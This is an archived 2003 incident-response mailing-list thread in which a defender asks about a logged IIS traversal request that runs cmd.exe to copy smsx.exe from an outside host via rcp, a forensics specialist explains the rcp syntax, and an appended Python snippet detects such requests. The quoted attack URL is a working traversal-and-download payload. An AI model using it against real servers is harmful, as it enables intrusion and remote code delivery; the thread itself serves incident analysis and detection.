RE: smsx.exe?

From: Altheide, Cory B. (AltheideCat_private)
Date: Mon May 05 2003 - 17:25:32 PDT


    No, adm is the user, at least according to the rcp usage instructions.
    
    H:\>rcp
    
    Copies files to and from computer running the RCP service.
    
    RCP [-a | -b] [-h] [-r] [host][.user:]source [host][.user:] path\destination
    
      -a                 Specifies ASCII transfer mode. This mode converts
                         the EOL characters to a carriage return for UNIX
                         and a carriage
                         return/line feed for personal computers. This is
                         the default transfer mode.
      -b                 Specifies binary image transfer mode.
      -h                 Transfers hidden files.
      -r                 Copies the contents of all subdirectories;
                         destination must be a directory.
      host               Specifies the local or remote host. If host is
                         specified as an IP address OR if host name contains
                         dots, you must specify the user.
      .user:             Specifies a user name to use, rather than the
                         current user name.
      source             Specifes the files to copy.
      path\destination   Specifies the path relative to the logon directory
                         on the remote host. Use the escape characters
                         (\ , ", or ') in remote paths to use wildcard
                         characters on the remote host.
    
    "rcp -b 195.92.252.138.adm:smsx.exe ."
    
    RCP smsx.exe from 195.92.252.138 to . (here) as user adm.
    
    Your windows guy should have tried typing the command with no arguments...
    ;-P
    
    Cory Altheide
    Computer Forensics Specialist
    NCI Information Systems, Inc.
    NNSA Cyber Forensics Center
    altheidecat_private
    
    > -----Original Message-----
    > From: Steve Bromwich [mailto:incidentat_private] 
    > Sent: Monday, May 05, 2003 10:30 AM
    > To: incidentsat_private
    > Subject: smsx.exe?
    > 
    > 
    > Hi,
    > 
    > Has anyone seen a request like this in their logs?
    > 
    > 205.247.193.56 - - [05/May/2003:11:59:52 -0300]
    > "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.92.252.138.adm:smsx.exe+."
    > 
    > I tried rcping smsx.exe off the remote site but no joy; is 
    > the .adm an obscure windows-specific port address or 
    > something? One of our windows guys said the smsx was "remote 
    > management software", but had no idea about the .adm...
    > 
    > On a side note, the response I got from energis (the 
    > 195.92.252.138 owner) had the following at the start:
    > 
    > PLEASE NOTE WE ARE CURRENTLY DEALING WITH A 2 WEEK BACKLOG
    > 
    > Further down:
    > 
    > Please note that if one of our IP addresses looks up to a 
    > 'webcache' (as opposed to a modem) we have a *maximum* of 30 
    > hours to trace the user responsible for the abuse.
    > 
    > So I guess this means that Energis users have a pretty good 
    > chance of abusing remote servers through Energis' web cache 
    > and getting away with it :-/
    > 
    > Cheers, Steve
    > 
    > ----------------------------------------------------------------------------
    > Attend Black Hat Briefings & Training Europe, May 12-15 in 
    > Amsterdam, the 
    > world's premier event for IT and network security experts.  
    > The two-day 
    > Training features 6 hand-on courses on May 12-13 taught by 
    > professionals.  
    > The two-day Briefings on May 14-15 features 24 top speakers 
    > with no vendor 
    > sales pitches.  Deadline for the best rates is April 25.  
    > Register today to 
    > ensure your place. http://www.securityfocus.com/BlackHat-incidents 
    > ----------------------------------------------------------------------------
    > 
    > 
    
    
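An added detection example, not part of the thread: it decodes the double-encoded (`%255c`) request Steve quoted, flags the traversal into cmd.exe, and splits the rcp `host.user:file` operand the way Cory's usage text describes. The log lines are constructed and the function names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not the original server log): the first mirrors
# the request quoted in the thread, the second is a benign request.
SAMPLE_LOG = [
    '205.247.193.56 - - [05/May/2003:11:59:52 -0300] '
    '"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.92.252.138.adm:smsx.exe+."',
    '192.0.2.10 - - [05/May/2003:12:01:03 -0300] "GET /index.html HTTP/1.1" 200 1024',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:[A-Z]+ )?(?P<url>[^" ]+)')
RCP_SRC_RE = re.compile(r"\brcp\b(?:\s+-\w+)*\s+(\S+)")  # rcp [-flags] <source>

def full_decode(s, max_rounds=4):
    """URL-decode until stable: '..%255c' -> '..%5c' -> '..\\'. Returns (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        d = unquote(s)
        if d == s:
            break
        s, rounds = d, rounds + 1
    return s, rounds

def parse_rcp_source(token):
    """Split an rcp '[host][.user:]source' operand: the part before ':' is
    host.user, and the last '.' separates the user from the (dotted) host."""
    hostuser, sep, filename = token.partition(":")
    if not sep:
        return {"host": None, "user": None, "file": hostuser}
    host, _, user = hostuser.rpartition(".")
    return {"host": host or None, "user": user, "file": filename}

def analyze(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded, rounds = full_decode(m.group("url"))
    norm = decoded.replace("\\", "/").lower()   # treat %5c and / alike
    path, _, query = norm.partition("?")
    findings = []
    if rounds > 1:                 # needed more than one decode pass
        findings.append("double-encoded")
    if "/../" in path:
        findings.append("traversal")
    if path.endswith("/cmd.exe"):
        findings.append("cmd.exe")
    rcp = None
    src = RCP_SRC_RE.search(query.replace("+", " "))  # '+' is a space in the query
    if src:
        findings.append("rcp")
        rcp = parse_rcp_source(src.group(1))
    return {"ip": m.group("ip"), "findings": findings, "rcp": rcp}
```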
    



    This archive was generated by hypermail 2b30 : Mon May 05 2003 - 17:34:39 PDT